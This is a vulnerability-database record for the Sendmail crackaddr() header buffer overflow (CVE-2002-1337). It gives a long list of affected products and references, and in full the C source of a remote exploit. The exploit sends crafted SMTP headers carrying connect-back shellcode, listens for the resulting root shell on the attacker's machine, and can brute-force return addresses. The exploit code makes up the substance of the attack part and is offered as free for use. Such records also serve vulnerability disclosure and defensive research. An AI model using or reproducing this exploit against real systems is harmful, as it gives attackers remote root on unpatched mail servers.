Details of VAR-E-200303-0035

ID

VAR-E-200303-0035

CVE

cve_id:

CVE-2002-1337

Trust: 1.9

sources: BID: 6991 // EXPLOIT-DB: 22314 // EDBNET: 44506

EDB ID

22314

TITLE

Sendmail 8.12.x - Header Processing Buffer Overflow (2) - Unix remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 22314

DESCRIPTION

Sendmail 8.12.x - Header Processing Buffer Overflow (2). CVE-2002-1337CVE-4502 . remote exploit for Unix platform

Trust: 0.6

sources: EXPLOIT-DB: 22314

AFFECTED PRODUCTS

vendor:	sendmail	model:	-	scope:	eq	version:	8.12.x	Trust: 1.0
vendor:	hp	model:	hp-ux	scope:	eq	version:	11.04	Trust: 0.6
vendor:	wind	model:	river systems platform sa	scope:	eq	version:	1.0	Trust: 0.3
vendor:	wind	model:	river systems bsd/os	scope:	eq	version:	5.0	Trust: 0.3
vendor:	wind	model:	river systems bsd/os	scope:	eq	version:	4.3.1	Trust: 0.3
vendor:	wind	model:	river systems bsd/os	scope:	eq	version:	4.2	Trust: 0.3
vendor:	sun	model:	solaris 9 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	9	Trust: 0.3
vendor:	sun	model:	solaris 8 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 8 sparc	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 7.0 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	7.0	Trust: 0.3
vendor:	sun	model:	solaris 2.6 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	2.6	Trust: 0.3
vendor:	sun	model:	lx50	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	cobalt raq xtr	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	cobalt raq	scope:	eq	version:	550	Trust: 0.3
vendor:	sun	model:	cobalt raq	scope:	eq	version:	4	Trust: 0.3
vendor:	sun	model:	cobalt raq	scope:	eq	version:	3	Trust: 0.3
vendor:	sun	model:	cobalt qube	scope:	eq	version:	3	Trust: 0.3
vendor:	sun	model:	cobalt manageraq3 3000r-mr	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	cobalt cacheraq	scope:	eq	version:	4	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.19	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.18	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.17	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.16	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.15	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.14	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.13	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.12	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.11	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.10	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.9	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.8	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.7	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.6	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.5	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.4	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.3	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.2	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.1	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5	Trust: 0.3
vendor:	sgi	model:	freeware	scope:	eq	version:	1.0	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	3.0	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1.4	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	3.0	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	2.6.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	2.6	Trust: 0.3
vendor:	sendmail	model:	inc sendmail advanced message server	scope:	eq	version:	1.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail advanced message server	scope:	eq	version:	1.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	3.0	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1.4	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	3.0	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	2.6.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	2.6	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.7	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.6	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.5	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.4	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta7	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta5	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta16	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta12	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta10	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.0	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.6	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.5	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.4	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.10.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.10.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.10	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.9.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.9.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.9.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.9.0	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.8.8	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	5.65	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	5.61	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	5.59	Trust: 0.3
vendor:	sco	model:	unixware	scope:	eq	version:	7.1.3	Trust: 0.3
vendor:	sco	model:	unixware	scope:	eq	version:	7.1.1	Trust: 0.3
vendor:	sco	model:	open unix	scope:	eq	version:	8.0	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.6	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.5.3	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.5.2	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.5.1	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.5	Trust: 0.3
vendor:	ibm	model:	z/os v1r4	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	z/os v1r2	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/390 v2r8	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/390 v2r10	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	mvs	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	mpe/ix	scope:	eq	version:	6.5	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	11.22	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	11.11	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	11.0	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	10.20	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	10.10	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.22	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.11	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.04	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.00	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	alphaserver sc	scope:	-	version:	-	Trust: 0.3
vendor:	gentoo	model:	linux rc2	scope:	eq	version:	1.4	Trust: 0.3
vendor:	gentoo	model:	linux rc1	scope:	eq	version:	1.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.6	Trust: 0.3
vendor:	sgi	model:	irix	scope:	ne	version:	6.5.20	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	ne	version:	3.0.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	ne	version:	2.2.5	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	ne	version:	2.1.5	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	ne	version:	3.0.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	ne	version:	2.6.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	ne	version:	3.0.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	ne	version:	2.2.5	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	ne	version:	2.1.5	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	ne	version:	3.0.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	ne	version:	2.6.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	ne	version:	8.12.8	Trust: 0.3
vendor:	openwall	model:	gnu/*/linux	scope:	ne	version:	1.0	Trust: 0.3
vendor:	juniper	model:	networks junos	scope:	ne	version:	5.1	Trust: 0.3
vendor:	juniper	model:	networks junos	scope:	ne	version:	5.0	Trust: 0.3

sources: BID: 6991 // EXPLOIT-DB: 22314

EXPLOIT

// source: https://www.securityfocus.com/bid/6991/info

Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.

Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.

Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.

/* Sendmail <8.12.8 crackaddr() exploit by bysin */
/* from the l33tsecurity crew */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

int maxarch=1;
struct arch {
char *os;
int angle,nops;
unsigned long aptr;
} archs[] = {
{"Slackware 8.0 with sendmail 8.11.4",138,1,0xbfffbe34}
};

/////////////////////////////////////////////////////////

#define LISTENPORT 2525
#define BUFSIZE 4096

char code[]= /* 116 bytes */
"\xeb\x02" /* jmp <shellcode+4> */
"\xeb\x08" /* jmp <shellcode+12> */
"\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */
"\xcd\x7f" /* int $0x7f */
"\xc3" /* ret */
"\x5f" /* pop %edi */
"\xff\x47\x01" /* incl 0x1(%edi) */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x6a\x01" /* push $0x1 */
"\x6a\x02" /* push $0x2 */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\xb0\x66" /* mov $0x66,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\x43" /* inc %ebx */
"\xff\xd7" /* call *%edi */
"\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */
"\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */
"\x31\xca" /* xor %ecx,%edx */
"\x52" /* push %edx */
"\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */
"\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */
"\x31\xca" /* xor %ecx,%edx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x5e" /* pop %esi */
"\x6a\x10" /* push $0x10 */
"\x56" /* push %esi */
"\x50" /* push %eax */
"\x50" /* push %eax */
"\x5e" /* pop %esi */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\xb0\x66" /* mov $0x66,%al */
"\x6a\x03" /* push $0x3 */
"\x5b" /* pop %ebx */
"\xff\xd7" /* call *%edi */
"\x56" /* push %esi */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x03" /* mov $0x3,%cl */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x3f" /* mov $0x3f,%al */
"\x49" /* dec %ecx */
"\xff\xd7" /* call *%edi */
"\x41" /* inc %ecx */
"\xe2\xf6" /* loop <shellcode+81> */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x54" /* push %esp */
"\x5b" /* pop %ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xff\xd7" /* call *%edi */
;

void header() {
printf("\nSendmail <8.12.8 crackaddr() exploit by bysin\n");
printf(" from the l33tsecurity crew \n\n");
}

void printtargets() {
unsigned long i;
header();
printf("\t Target\t Addr\t\t OS\n");
printf("\t-------------------------------------------\n");
for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].aptr,archs[i].os);
printf("\n");
}

void writesocket(int sock, char *buf) {
if (send(sock,buf,strlen(buf),0) <= 0) {
printf("Error writing to socket\n");
exit(0);
}
}

void readsocket(int sock, int response) {
char temp[BUFSIZE];
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Error reading from socket\n");
exit(0);
}
if (response != atol(temp)) {
printf("Bad response: %s\n",temp);
exit(0);
}
}

int readutil(int sock, int response) {
char temp[BUFSIZE],*str;
while(1) {
fd_set readfs;
struct timeval tm;
FD_ZERO(&readfs);
FD_SET(sock,&readfs);
tm.tv_sec=1;
tm.tv_usec=0;
if(select(sock+1,&readfs,NULL,NULL,&tm) <= 0) return 0;
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Error reading from socket\n");
exit(0);
}
str=(char*)strtok(temp,"\n");
while(str && *str) {
if (atol(str) == response) return 1;
str=(char*)strtok(NULL,"\n");
}
}
}

#define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||(((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0)))

void findvalmask(char* val,char* mask,int len) {
int i;
unsigned char c,m;
for(i=0;i<len;i++) {
c=val[i];
m=0xff;
while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--;
val[i]=c^m;
mask[i]=m;
}
}

void fixshellcode(char *host, unsigned short port) {
unsigned long ip;
char abuf[4],amask[4],pbuf[2],pmask[2];
if ((ip = inet_addr(host)) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(host)) == NULL) {
printf("Unable to resolve local address\n");
exit(0);
}
memcpy((char*)&ip, hostm->h_addr, hostm->h_length);
}
abuf[3]=(ip>>24)&0xff;
abuf[2]=(ip>>16)&0xff;
abuf[1]=(ip>>8)&0xff;
abuf[0]=(ip)&0xff;
pbuf[0]=(port>>8)&0xff;
pbuf[1]=(port)&0xff;
findvalmask(abuf,amask,4);
findvalmask(pbuf,pmask,2);
memcpy(&code[33],abuf,4);
memcpy(&code[38],amask,4);
memcpy(&code[48],pbuf,2);
memcpy(&code[53],pmask,2);
}

void getrootprompt() {
int sockfd,sin_size,tmpsock,i;
struct sockaddr_in my_addr,their_addr;
char szBuffer[1024];
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Error creating listening socket\n");
return;
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(LISTENPORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
memset(&(my_addr.sin_zero), 0, 8);
if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
printf("Error binding listening socket\n");
return;
}
if (listen(sockfd, 1) == -1) {
printf("Error listening on listening socket\n");
return;
}
sin_size = sizeof(struct sockaddr_in);
if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) {
printf("Error accepting on listening socket\n");
return;
}
writesocket(tmpsock,"uname -a\n");
while(1) {
fd_set readfs;
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(tmpsock,&readfs);
if(select(tmpsock+1,&readfs,NULL,NULL,NULL)) {
int cnt;
char buf[1024];
if (FD_ISSET(0,&readfs)) {
if ((cnt=read(0,buf,1024)) < 1) {
if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
else {
printf("Connection closed\n");
return;
}
}
write(tmpsock,buf,cnt);
}
if (FD_ISSET(tmpsock,&readfs)) {
if ((cnt=read(tmpsock,buf,1024)) < 1) {
if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
else {
printf("Connection closed\n");
return;
}
}
write(1,buf,cnt);
}
}
}
close(tmpsock);
close(sockfd);
return;
}

int main(int argc, char **argv) {
struct sockaddr_in server;
unsigned long ipaddr,i,bf=0;
int sock,target;
char tmp[BUFSIZE],buf[BUFSIZE],*p;
if (argc <= 3) {
printf("%s <target ip> <myip> <target number> [bruteforce start addr]\n",argv[0]);
printtargets();
return 0;
}
target=atol(argv[3]);
if (target < 0 || target >= maxarch) {
printtargets();
return 0;
}
if (argc > 4) sscanf(argv[4],"%x",&bf);

header();

fixshellcode(argv[2],LISTENPORT);
if (bf && !fork()) {
getrootprompt();
return 0;
}

bfstart:
if (bf) {
printf("Trying address 0x%x\n",bf);
fflush(stdout);
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Unable to create socket\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(25);
if (!bf) {
printf("Resolving address... ");
fflush(stdout);
}
if ((ipaddr = inet_addr(argv[1])) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(argv[1])) == NULL) {
printf("Unable to resolve address\n");
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (!bf) {
printf("Address found\n");
printf("Connecting... ");
fflush(stdout);
}
if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
printf("Unable to connect\n");
exit(0);
}
if (!bf) {
printf("Connected!\n");
printf("Sending exploit... ");
fflush(stdout);
}
readsocket(sock,220);
writesocket(sock,"HELO yahoo.com\r\n");
readsocket(sock,250);
writesocket(sock,"MAIL FROM: spiderman@yahoo.com\r\n");
readsocket(sock,250);
writesocket(sock,"RCPT TO: MAILER-DAEMON\r\n");
readsocket(sock,250);
writesocket(sock,"DATA\r\n");
readsocket(sock,354);
memset(buf,0,sizeof(buf));
p=buf;
for (i=0;i<archs[target].angle;i++) {
*p++='<';
*p++='>';
}
*p++='(';
for (i=0;i<archs[target].nops;i++) *p++=0xf8;
*p++=')';
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
*p++=0;
sprintf(tmp,"Full-name: %s\r\n",buf);
writesocket(sock,tmp);
sprintf(tmp,"From: %s\r\n",buf);
writesocket(sock,tmp);

p=buf;
archs[target].aptr+=4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];

for (i=0;i<0x14;i++) *p++=0xf8;
archs[target].aptr+=0x18;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];

for (i=0;i<0x4c;i++) *p++=0x01;
archs[target].aptr+=0x4c+4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];

for (i=0;i<0x8;i++) *p++=0xf8;
archs[target].aptr+=0x08+4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];

for (i=0;i<0x20;i++) *p++=0xf8;
for (i=0;i<strlen(code);i++) *p++=code[i];

*p++=0;
sprintf(tmp,"Subject: AAAAAAAAAAA%s\r\n",buf);
writesocket(sock,tmp);
writesocket(sock,".\r\n");
if (!bf) {
printf("Exploit sent!\n");
printf("Waiting for root prompt...\n");
if (readutil(sock,451)) printf("Failed!\n");
else getrootprompt();
}
else {
readutil(sock,451);
close(sock);
bf+=4;
goto bfstart;
}
}

Trust: 1.0

sources: EXPLOIT-DB: 22314

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 22314

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 22314

TYPE

Header Processing Buffer Overflow (2)

Trust: 1.0

sources: EXPLOIT-DB: 22314

CREDITS

bysin

Trust: 0.6

sources: EXPLOIT-DB: 22314

EXTERNAL IDS

db:	NVD	id:	CVE-2002-1337	Trust: 1.9
db:	EXPLOIT-DB	id:	22314	Trust: 1.9
db:	BID	id:	6991	Trust: 1.9
db:	EDBNET	id:	44506	Trust: 0.6

sources: BID: 6991 // EXPLOIT-DB: 22314 // EDBNET: 44506

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2002-1337	Trust: 1.6
url:	https://www.securityfocus.com/bid/6991/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/22314/	Trust: 0.6
url:	http://www-1.ibm.com/services/continuity/recover1.nsf/mss/mss-oar-e01-2003.0794.1	Trust: 0.3
url:	http://www.slackware.org/lists/archive/viewer.php?l=slackware-security&y=2003&m=slackware-security.286398	Trust: 0.3
url:	http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51ab21-c0103500-17099-es-20030226.readme	Trust: 0.3
url:	http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/51181	Trust: 0.3
url:	http://www.sendmail.org/	Trust: 0.3
url:	http://www.info.apple.com/usen/security/security_updates.html	Trust: 0.3
url:	http://ftp1.support.compaq.com/public/unix/v5.0a/t64v50ab17-c0031300-16884-es-20030211.readme	Trust: 0.3
url:	http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51b20-c0169800-16980-es-20030218.readme	Trust: 0.3
url:	http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51bb1-c0003900-16874-es-20030211.readme	Trust: 0.3
url:	https://www.exploit-db.com/exploits/22313	Trust: 0.3
url:	http://www.cert.org/advisories/ca-2003-07.html	Trust: 0.3
url:	http://www.sendmail.org/8.12.8.html	Trust: 0.3
url:	https://www.exploit-db.com/exploits/22314	Trust: 0.3
url:	http://www.sendmail.com	Trust: 0.3
url:	http://www.sendmail.org	Trust: 0.3

sources: BID: 6991 // EXPLOIT-DB: 22314 // EDBNET: 44506

SOURCES

db:	BID	id:	6991
db:	EXPLOIT-DB	id:	22314
db:	EDBNET	id:	44506

LAST UPDATE DATE

2022-07-27T09:23:53.289000+00:00

SOURCES UPDATE DATE

db:

BID

id:

6991

date:

2007-09-22T00:30:00

SOURCES RELEASE DATE

db:	BID	id:	6991	date:	2003-03-02T00:00:00
db:	EXPLOIT-DB	id:	22314	date:	2003-03-02T00:00:00
db:	EDBNET	id:	44506	date:	2003-03-02T00:00:00